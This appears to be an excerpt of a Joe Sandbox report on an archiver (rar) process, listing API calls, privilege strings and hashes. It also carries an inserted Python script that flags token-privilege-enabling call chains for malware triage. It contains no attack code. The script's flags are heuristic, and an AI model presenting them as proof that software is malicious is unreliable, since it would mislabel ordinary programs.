                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF73
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF84
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69A3FEFA7
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF69A3FEFCA
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: GetLastError.KERNEL32 ref: 00007FF69A3FEFD4
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3FEF50: CloseHandle.KERNEL32 ref: 00007FF69A3FEFE7
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32 ref: 00007FF69A3FD4C6
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF69A3FD64A
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF69A3FD68B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF69A3FD69A
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00007FF69A3FD6AD
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32 ref: 00007FF69A3FD6FA
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32 ref: 00007FF69A3FD705
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A402310: FlushFileBuffers.KERNEL32 ref: 00007FF69A40233E
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A402310: SetFileTime.KERNEL32 ref: 00007FF69A4023DB
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A401930: CloseHandle.KERNELBASE ref: 00007FF69A401958
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4039E0: SetFileAttributesW.KERNEL32(?,00007FF69A4034EE,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A403A0F
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4039E0: SetFileAttributesW.KERNEL32(?,00007FF69A4034EE,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A403A3C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                      • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                      • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                      • Instruction ID: fae102ebcc877be072fa8cf289a2e733edc778cfa97bbd388b2fd3a9a1ca010b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D1CD26A1868686EB709F20E8442FE73E0FB41B98F4041B9DA5DC76D9DF3CD60AD700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AEE9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF01
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF19
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AF75
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42AFB0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B23B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B244
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF69A3E2E4C), ref: 00007FF69A42B287
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                      • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                      • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                      • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                      • Instruction ID: 0b9344d562f7211d9c3a7ce3a022a0306522d1a6bca8dc7a7ef2c1ddcba796b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EC17A26A19B8286EB20DF21E8542A977E0FB85B98F4440B5DE4EC7799DF3CE546C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction ID: 510eb6bae4c3be4e0e6eb7e8ce36962fd380a4bbc0de1d0f67b486362ba87598
• Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction Fuzzy Hash: 71216375A1864286F7B09B21E45937E73E1EB85F44F6050B5EA4EC6658CF3EE44A8700
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2F7
  • Part of subcall function 00007FF69A3FEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF73
  • Part of subcall function 00007FF69A3FEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF84
  • Part of subcall function 00007FF69A3FEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69A3FEFA7
  • Part of subcall function 00007FF69A3FEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF69A3FEFCA
  • Part of subcall function 00007FF69A3FEF50: GetLastError.KERNEL32 ref: 00007FF69A3FEFD4
  • Part of subcall function 00007FF69A3FEF50: CloseHandle.KERNEL32 ref: 00007FF69A3FEFE7
• DeviceIoControl.KERNEL32 ref: 00007FF69A3FE357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE362
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
• String ID: SeBackupPrivilege
• API String ID: 3094086963-2429070247
• Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction ID: 245c406ab3147a6cacbc0d77b24bc7d889d0f755fa181aaf30a3a8afd79ae1ad
• Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction Fuzzy Hash: 8561AF32A186818AF7349B21E4552B933E0FB48B98F5042BEEB6ED66D4DF3CE545D700
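The entry above is the kind of listing worth reading mechanically rather than by eye: the calls attributed to "Part of subcall function 00007FF69A3FEF50" are the classic token-privilege enabling idiom (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges), and the entry's String ID pairs it with SeBackupPrivilege, after which the function goes on to DeviceIoControl. The script below is an added triage example, not code from the Joe Sandbox report or from the analysed sample: it parses lines in the format the report prints under APIs, groups subcall lines by their callee, looks for that chain, and reports which handle operations follow it. The sample input is the listing above, copied into a constructed string; the function and finding names are my own, and the join between the String ID and the API chain is my heuristic, not something the sandbox asserts.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple

# Constructed sample input: the "APIs" listing of one function entry, in the
# form Joe Sandbox prints it (direct calls, plus calls attributed to a callee
# through "Part of subcall function <addr>:"). Copied from the entry above.
SAMPLE_APIS = """\
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE2F7
  • Part of subcall function 00007FF69A3FEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF73
  • Part of subcall function 00007FF69A3FEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF69A3FEE47), ref: 00007FF69A3FEF84
  • Part of subcall function 00007FF69A3FEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69A3FEFA7
  • Part of subcall function 00007FF69A3FEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF69A3FEFCA
  • Part of subcall function 00007FF69A3FEF50: GetLastError.KERNEL32 ref: 00007FF69A3FEFD4
  • Part of subcall function 00007FF69A3FEF50: CloseHandle.KERNEL32 ref: 00007FF69A3FEFE7
• DeviceIoControl.KERNEL32 ref: 00007FF69A3FE357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF69A3E2014), ref: 00007FF69A3FE362
"""

# One listing line: optional subcall attribution, Api.MODULE, optional argument
# list (the sandbox prints '?' for arguments it could not recover), call-site ref.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]        # '?' = argument value unknown to the sandbox
    ref: int                     # call-site address
    subcall: Optional[int]       # callee the call was attributed to, or None


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse the APIs block of one function entry, keeping listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"].upper(), args, int(m["ref"], 16), sub))
    return calls


def calls_by_module(calls: Sequence[ApiCall]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


# The token-privilege enabling idiom, in call order; other calls may sit between.
PRIVILEGE_CHAIN = ("OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges")


def contains_in_order(names: Sequence[str], chain: Sequence[str]) -> bool:
    """True if `chain` occurs as a subsequence of `names`."""
    it = iter(names)
    return all(any(n == want for n in it) for want in chain)


def find_privilege_adjustment(calls: Sequence[ApiCall]) -> List[Optional[int]]:
    """Callees (None = the entry's own body) whose attributed calls contain the chain."""
    groups: Dict[Optional[int], List[str]] = {}
    for c in calls:
        groups.setdefault(c.subcall, []).append(c.api)
    return [addr for addr, names in groups.items() if contains_in_order(names, PRIVILEGE_CHAIN)]


def triage(calls: Sequence[ApiCall], string_ids: Sequence[str] = ()) -> List[str]:
    """Short findings for one entry. `string_ids` is the entry's 'String ID' field
    (here ["SeBackupPrivilege"]); joining it to the API chain is a heuristic."""
    findings: List[str] = []
    privs = [s for s in string_ids if s.startswith("Se") and s.endswith("Privilege")]
    names = [c.api for c in calls]
    for addr in find_privilege_adjustment(calls):
        where = "the function body" if addr is None else f"subcall {addr:016X}"
        findings.append(f"enables {', '.join(privs) or 'a token privilege'} "
                        f"via AdjustTokenPrivileges in {where}")
    if "AdjustTokenPrivileges" in names:
        after = names[names.index("AdjustTokenPrivileges") + 1:]
        for api in ("CreateFileW", "DeviceIoControl"):
            if api in after:
                findings.append(f"{api} is reached after the privilege is enabled")
    return findings
```

On the sample, `triage(parse_api_listing(SAMPLE_APIS), ["SeBackupPrivilege"])` reports the privilege being enabled in subcall 00007FF69A3FEF50 and DeviceIoControl following it. Treat that as context rather than a verdict: the snapshot name for this dump ends in `_rar`, and an archiver requesting SeBackupPrivilege to read files it would otherwise be denied is expected behaviour; what matters for the case is which process loaded this module and what it was asked to pack.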
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Sleepswprintf
• String ID: $%ls%0*u.rev
• API String ID: 407366315-3491873314
• Opcode ID: f5880cced479fe1795b029d12895a0fb1c2bb5479e69c55e6c9ed3f87b6ea043
• Instruction ID: 60bce28255412f4e649183de90752ef7a162af8cc30670ae4385f120dde87d24
• Opcode Fuzzy Hash: f5880cced479fe1795b029d12895a0fb1c2bb5479e69c55e6c9ed3f87b6ea043
• Instruction Fuzzy Hash: 1502E232A046928AEB30DF25D8486BD77E5FB99B84F4101B5DE5D87799DE3CE442C700
APIs
• new.LIBCMT ref: 00007FF69A3E4BD8
  • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
  • Part of subcall function 00007FF69A401E80: CreateFileW.KERNELBASE ref: 00007FF69A401F4A
  • Part of subcall function 00007FF69A401E80: GetLastError.KERNEL32 ref: 00007FF69A401F59
  • Part of subcall function 00007FF69A401E80: CreateFileW.KERNELBASE ref: 00007FF69A401F99
  • Part of subcall function 00007FF69A401E80: GetLastError.KERNEL32 ref: 00007FF69A401FA2
  • Part of subcall function 00007FF69A401E80: SetFileTime.KERNEL32 ref: 00007FF69A401FF1
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$SleepTime
• String ID: %12s %s$%12s %s$ $%s
• API String ID: 2965465231-221484280
• Opcode ID: ba45724a170e408e76c829c60de67d83593fbeaf5c284933ce6980083859298c
• Instruction ID: e4545175be8514fdff221354f95a50924d78b3cad35c4646acb46823d345ab31
• Opcode Fuzzy Hash: ba45724a170e408e76c829c60de67d83593fbeaf5c284933ce6980083859298c
• Instruction Fuzzy Hash: A5F19C22B09A8686EA70DB12D4402BE73E1FB89B84F5444FADA4DC7786DF3DD955C700
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                      • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                      • Instruction ID: 1cd3013a4c8faf4a4b1ae75b91f5a6eab02a705a2b04ca574c806b70ec72d751
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01314C36618F818ADB70CF25E8412AE73E4FB89B58F5401B5EA9D87B99DF38D145CB00
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 3398352648-0
• Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction ID: 0aff9e60fcc5168db1fa131f7b91a016f692616625f331cc9773f7c2e9d58aa9
• Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction Fuzzy Hash: 0B113036618B4186E7608F21F44456A77E4FBC9F84F5555BAEA8EC3628DF3CD005CB40
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
• String ID:
• API String ID: 3116915952-0
• Opcode ID: 0d49e5e1870b6e2cd32107f7c0a4bbc3c1d275d8719a69b3e60c906fddd00a3c
• Instruction ID: 18e4d00d22030d99005778de156b8cb945f6b1dafbb1b1d67413f865e467c64b
• Opcode Fuzzy Hash: 0d49e5e1870b6e2cd32107f7c0a4bbc3c1d275d8719a69b3e60c906fddd00a3c
• Instruction Fuzzy Hash: 6EE16E22A18A8682EA30EB25E4505FD73E1FB89B84F5540F6DE4DC7796DE39E905C700
APIs
• CreateFileW.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403AC4
• CreateFileW.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403B0A
• DeviceIoControl.KERNEL32 ref: 00007FF69A403B55
• CloseHandle.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403B60
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CreateFile$CloseControlDeviceHandle
• String ID:
• API String ID: 998109204-0
• Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
• Instruction ID: 4566933cc88c5b4649eb0bdf2032a1763a3afd74f1ec0689b6add1ef3c27b7dc
• Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
• Instruction Fuzzy Hash: 7F31A136618B8086E7708F11B44469AB7E4FB89BF4F010275EAA993BD8CF3CD4558B00
